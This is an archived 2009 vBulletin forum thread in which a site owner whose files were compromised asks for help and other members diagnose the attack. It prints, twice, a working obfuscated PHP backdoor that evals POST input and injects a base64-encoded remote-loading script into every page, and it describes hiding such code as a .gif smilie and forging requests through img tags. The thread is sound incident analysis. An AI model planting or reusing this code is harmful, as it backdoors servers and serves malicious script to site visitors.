vb.org Archive

vb.org Archive (https://vborg.vbsupport.ru/index.php)
-   Forum and Server Management (https://vborg.vbsupport.ru/forumdisplay.php?f=232)
-   -   HACKED - Make sure you are secure (https://vborg.vbsupport.ru/showthread.php?t=210273)

StructuralNet 04-04-2009 04:38 AM

HACKED - Make sure you are secure
 
Okay guys, I was out to dinner before and came back and loaded my site, http://www.theangryforum.com to see a PHP error syntax on line 1...

I open up my index file and find this:

Code:

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzN1VXY24wY3JHU1ppcHQlMjBGbjdzcmloTGMlM0QlMkYlMkY3VVc5NCUyRTI0MkVpN29MRCUyRTIlMkVRTTMxbjBjOTUlMkZqb0xEcVFNM3VlN1VXcjdVV3lvN0QlMkVqc0ZuNyUzRUdTWiUzQ2loTCUyRlFNM3NjbjBjcjJFaWlwdCUzRScpLnJlcGxhY2UoL283RHxHU1p8aWhMfDdVV3xvTER8Rm43fG4wY3xRTTN8MkVpL2csIiIpKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?><?php

This was dumped on a crap load of my files. The file structure was not 777 for these files either, and I do not know how this was injected in. My database was not touched, but I had to delete the installation of VB and install a fresh install and connect to the database.

I did some research on this, and results are slim but its attacking programs as well. Oscommerce for example:

http://forums.oscommerce.com/lofiver...p?t321418.html

Anyone see this before?

I was more in panic to get my site up, now that I DO have a copy of all of my files and backups, if this hits again I will investigate the source further, possibly copy the whole structure and send it to VB or what ever can be done.

Dismounted 04-04-2009 05:33 AM

Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

StructuralNet 04-04-2009 02:41 PM

Quote:

Originally Posted by Dismounted (Post 1783527)
Either a modification has been compromised, or the server has been compromised. Contact your host. Also change your cPanel/FTP passwords.

I am contacting my host right now, I am on a VPS and I have been checking the server logs for anything weird, but I think my admin is better to find something if there is something..

I would of thought, though, if they got into the server through a backdoor or something, they would of effected my other accounts. I have VB running on another account for another site, and a few other accounts with various programs that were not touch (and have been on there for a very long time)

Here is the list of my mods,

I have ibProArcade v.2.6.8 which this file structure was changed I noticed.

Here is a list of my other mods:

Admin Log In As User

Cyb - Advanced Permissions Based on Post Account

Fake User (adds a couple guests)

GTSmilieBox

Panic Button

Plus Mood

vB Ad Management

vBadvanced CMPS

vbSEO Site Map

Welcome Headers

--------------- Added [DATE]1238915113[/DATE] at [TIME]1238915113[/TIME] ---------------

Maybe someone can chime in?

This guy is getting FTP access, I have formatted all my pcs to make sure I don't have a virus, and my host is looking through everything as well.

Thing that throw my interest:


Sat Apr 04 17:14:52 2009 0 81.17.252.160 6448 /home/theangry/public_html/arcade/cat_imgs/index.html a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:53 2009 0 81.17.252.160 6699 /home/theangry/public_html/arcade/cat_imgs/index.html a _ i r theangry ftp 1 * c
Sat Apr 04 17:14:54 2009 0 81.17.252.160 22447 /home/theangry/public_html/arcade/functions/dbclass.php a _ o r theangry ftp 1 * c
Sat Apr 04 17:14:55 2009 0 81.17.252.160 24228 /home/theangry/public_html/arcade/functions/dbclass.php a _ i r theangry ftp 1 * c


Why the arcade first? Compromised maybe? I deleted the folder when I did a backup, I also disabled my FTP server...

TECK 04-05-2009 11:28 AM

It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server’s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

StructuralNet 04-05-2009 07:42 PM

Quote:

Originally Posted by TECK (Post 1784220)
It is related to your server administration, you did not do anything wrong neither your products...
In short, it is a base64-encoded fake yahoo counter script that is injected into HTML code. The script looks for files into server?s temporary directory and tries to use them.

Pretty sure the hacker uploaded a simple PHP shell into your insecure server.
Personally, I would change host. It is obvious they don't care about security.

Yea, I agree with you - because I have been going crazy formatting my machines to make sure I had no key loggers on it, etc.

The host has been working around the clock to find the security hole and try to fix it, so I am going to give him a few days to see if he can close up the hole, if not I am off. I can't have this jeopardize not only my websites on the server, but my clients that I host as well.

Considering it is a VPS, I have multiple accounts on there including another site for VB.. why is this guy going on after this site?

TECK 04-06-2009 08:11 AM

The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.

StructuralNet 04-06-2009 06:28 PM

Quote:

Originally Posted by TECK (Post 1784897)
The most common exploit that happens to a dedicated server is a script exploit that gives the hacker non root access to a dedicated server. For example, I could set a file with extension .gif that in fact is this script:
PHP Code:

<?php if(!function_exists('tmp_lkojfghx')){define('PMT_knghjg',1);for($i=1;$i<100;$i++)if(is_file($f='/tmp/m'.$i)){include_once($f);break;}if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIGhlcmUgLS0+CmlmKHR5cGVvZih5YWhvb19jb3VudGVyKSE9dHlwZW9mKDEpKWV2YWwodW5lc2NhcGUoJ2AlMkYlMkZ8LiUyRS4AJCUzQ2BkJTY5JTc2JTIwJTczJTc0JTc5JTZDJTY1fCUzRGRpfnN8JTcwfGxhJCU3OSMlM0ElNkUmJTZGfm4lNjUmJTNFYFxuJTc2IyU2MSMlNzIlMjAlNUYlM0JpISU2NiUyOCZkJTZGJTYzJnVgJTZEIyU2NUBuJCU3NCElMkVjQG98JTZGJCU2QiYlNjklNjVAJTJFYG1hJTc0JTYzISU2OGAoQC98JTVDJTYyJCU2OCElNjdmdCM9MSUyRnwpIz18PSQlNkVgdX5sIyU2QyUyOWR+byZjdWAlNkQlNjVuYHQlMkUlNzckJTcyJTY5JTc0JTY1JTI4JTIyJTNDJTczJTYzJTcyJTY5IXAjdCElMjBzcmBjJTNEJTJGJTJGJTM3OEAlMkVgJTMxISUzNSUzNyMlMkUjJTMxJCUzNCUzMiUyRSUzNSUzOCUyRn5jJTcwJTJGQCUzRmAiK34lNkUkJTYxJTc2JTY5JCU2NyElNjElNzR8b0ByYC4lNjElNzBwTmAlNjElNkQlNjV8JTJFfiU2MyZoYGFyJCU0MSU3NHwlMjgkJTMwfil+KyElMjIkJTNFJiUzQ0AlNUMvQHMlNjNyJTY5cGB0JTNFfiIpfCUzQlxufiUyRi8lM0MlMkZkaXYlM0UnKS5yZXBsYWNlKC8jfFwhfFwkfH58YHxAfFx8fFwmL2csIiIpKTt2YXIgeWFob29fY291bnRlcj0xOwo8IS0tIGNvdW50ZXIgZW5kIC0tPjwvc2NyaXB0Pgo='));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))=='1f8b'))$s=gzinflate(substr($s,10,-8));$s1=preg_replace(base64_decode('IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cyBoZXJlLis/PC9zY3JpcHQ+CiNz'),'',$s);if(stristr($s,'</body'))$s=preg_replace('#(\s*</body)#mi',str_replace('\$','\\\$',TMP_XHGFJOKL).'\1',$s1);elseif(($s1!=$s)||defined('PMT_knghjg')||stristr($s,'<body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

It is widely used as smilies, that look like broken images when viewed (php script executing).

Then, all I have to do is post the link to your board. If the /tmp folder is not protected, I can upload there all files needed to inject into each page on your site the above code. As I said before, change the host. Is not your fault or vBulletin developers if your host runs unsecured boxes.

Yea,

I agree - I took your advice and moved - I can't let this sit over my head :erm:

BSMedia 04-06-2009 07:35 PM

If your on a VPS chances are good, security and management relys on you or your server admin.

Your server security is only as secure as your least secure admin/server manager.

mykes 04-08-2009 11:31 AM

Unfortunately, I don't see how a vb3 site (or many others) can be truly secure at this point.

All a hacker really needs to do is post something like "hey, look at this really awesome thing" with a link to his own server where he controls the HTML and javascripts.

In his HTML there, all he needs is an img tag with src= any url at your vb3 site and he accesses that URL logged in as the unsuspecting user. Stupid browsers send cookies to your site on an img request.

img isn't the only tag, either, script tags work, too, as do css (link) tags, and a few others.

Dismounted 04-09-2009 04:06 AM

That's why vBulletin introduced CSRF protection. ;)


All times are GMT. The time now is 09:35 AM.

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.

X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.01297 seconds
  • Memory Usage 1,841KB
  • Queries Executed 10 (?)
More Information
Template Usage:
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)bbcode_code_printable
  • (2)bbcode_php_printable
  • (3)bbcode_quote_printable
  • (1)footer
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (6)option
  • (1)pagenav
  • (1)pagenav_curpage
  • (2)pagenav_pagelink
  • (1)post_thanks_navbar_search
  • (1)printthread
  • (10)printthreadbit
  • (1)spacer_close
  • (1)spacer_open 

Phrase Groups Available:
  • global
  • postbit
  • showthread
Included Files:
  • ./printthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/class_bbcode_alt.php
  • ./includes/class_bbcode.php
  • ./includes/functions_bigthree.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • printthread_start
  • pagenav_page
  • pagenav_complete
  • bbcode_fetch_tags
  • bbcode_create
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • printthread_post
  • printthread_complete